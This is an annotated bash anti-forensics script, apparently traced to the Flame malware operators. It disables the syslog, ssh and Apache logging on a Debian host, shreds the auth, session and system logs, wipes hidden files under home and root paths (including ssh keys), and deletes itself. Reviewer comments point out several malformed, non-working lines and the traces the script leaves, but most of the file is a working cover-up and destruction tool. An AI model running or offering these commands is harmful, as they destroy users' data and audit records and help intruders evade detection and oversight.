#!/bin/bash
# Original source: http://www.securelist.com/en/blog/750/Full_Analysis_of_Flame_s_Command_Control_servers
# Author: Stuxnet/Flame folks
#
# This script will remove all logging present on a Debian based system. Some tweaks
# should be done to make it compatible with other systems, such as those
# that do not support shred.
#
# NOTE(review): every target below is a local file or a local daemon. Logs that
# have already been forwarded off-host are outside its reach, and the config
# edits it makes (/etc/profile, sshd_config, the apache vhost files) are never
# reverted, so they remain on disk as persistent indicators after it runs.
# Several lines are malformed and fail outright (marked below), leaving the
# corresponding logger or step untouched.

# Require root: compare bash's real-uid variable with 0, otherwise exit 1.
if [[ $UID -ne 0 ]]; then
echo "This script must be run as root to be completely effective."
exit 1
fi
# Install needed application(s)
# Pulls chkconfig from the package repositories (needs network access). The
# install is itself recorded by the package manager; whether the /var/log
# globs further down cover those records depends on the distribution — verify.
apt-get install -y chkconfig
# Stop history
# Appends to /etc/profile so future login shells have no history file. This is
# a permanent edit of a system file and nothing below removes it.
echo "unset HISTFILE" >> /etc/profile
# Clears only the in-memory history of the shell running this script.
history -c
# Shreds the history file of whoever's $HOME '~' expands to; under sudo this
# may not be root's home — presumably root's history is intended, confirm.
find ~/.bash_history -exec shred -fvzu -n 3 {} \;
# Stop logging services
# For each syslog flavour: stop the running daemon, then disable it at boot.
service rsyslog stop
chkconfig rsyslog off
service sysklogd stop
chkconfig sysklogd off
service msyslog stop
# Malformed: invokes a command named 'chkconfigm', which does not exist, so
# this line fails and the boot-time setting for this logger is not changed.
chkconfigm syslog off
service syslog-ng stop
chkconfig syslog-ng off
# stop logging ssh
# Malformed: 'cp' with a single operand fails; no backup is taken.
cp /etc/ssh/aa
# Rewrites any LogLevel directive in sshd_config to QUIET (persistent edit).
sed -i 's/LogLevel.*/LogLevel QUIET/' /etc/ssh/sshd_config
shred -fvzu -n 3 /var/log/auth.log*
# Malformed: 'services' is not the service command, so this fails and the
# running sshd presumably keeps the LogLevel it was started with.
services sh restart
# Delete hidden files
# Walks the whole filesystem for dot-files, drops .bash_profile/.bashrc (the
# dots are regex wildcards here), keeps paths containing the substring
# "home" (first line) or "root" (second line) anywhere in the path, and
# shreds them. This is a mass-destructive step well beyond logging (ssh keys,
# per-user configs); the unquoted pipeline splits on whitespace, so names
# containing spaces are not removed cleanly. A full-filesystem find followed
# by bulk shred is also the most visible operation in the script.
find / -type f -name ".*" | grep -v ".bash_profile" | grep -v ".bashrc" | grep "home" | xargs shred -fvzu -n 3
find / -type f -name ".*" | grep -v ".bash_profile" | grep -v ".bashrc" | grep "root" | xargs shred -fvzu -n 3
# Stop apache2 logging
# Points ErrorLog/CustomLog of the default and default-ssl vhosts at /dev/null
# and raises LogLevel to emerg. The bracket class limits how much of the
# original path is consumed; other vhost files are not touched. The edited
# config files remain as indicators.
sed -i 's|ErrorLog [$/a-zA-Z0-9{}_.]*|ErrorLog /dev/null|g' /etc/apache2/sites-available/default
sed -i 's|CustomLog [$/a-zA-Z0-9{}_.]*|CustomLog /dev/null|g' /etc/apache2/sites-available/default
sed -i 's|LogLevel [$/a-zA-Z0-9{}_.]*|LogLevel emerg|g' /etc/apache2/sites-available/default
sed -i 's|ErrorLog [$/a-zA-Z0-9{}_.]*|ErrorLog /dev/null|g' /etc/apache2/sites-available/default-ssl
sed -i 's|CustomLog [$/a-zA-Z0-9{}_.]*|CustomLog /dev/null|g' /etc/apache2/sites-available/default-ssl
sed -i 's|LogLevel [$/a-zA-Z0-9{}_.]*|LogLevel emerg|g' /etc/apache2/sites-available/default-ssl
shred -fvzu -n 3 /var/log/apache2/*
service apache2 restart
# Delete various log files
# Each shred is backgrounded with '&' and nothing below waits on them, so the
# script continues to the self-delete step (and exits) while these may still
# be running. '-u' removes each file after overwriting it, including the live
# /var/run/utmp session table.
shred -fvzu -n 3 /var/log/wtmp &
shred -fvzu -n 3 /var/log/lastlog &
shred -fvzu -n 3 /var/run/utmp &
shred -fvzu -n 3 /var/log/mail.* &
shred -fvzu -n 3 /var/log/syslog* &
shred -fvzu -n 3 /var/log/messages* &
shred -fvzu -n 3 /var/log/*.log &
shred -fvzu -n 3 /var/log/*/*.log &
# Self delete
# Lists files under the current directory, greps for $0 (unquoted, used as a
# regex) and shreds the matches; the trailing '\;' is find -exec syntax and
# here is handed to shred as an extra operand. Because the search is rooted
# at ./, a script invoked by an absolute path from another directory may not
# match and would then survive on disk.
find ./ -type f | grep $0 | xargs -I {} shred -fvzu -n 3 {} \;
exit 0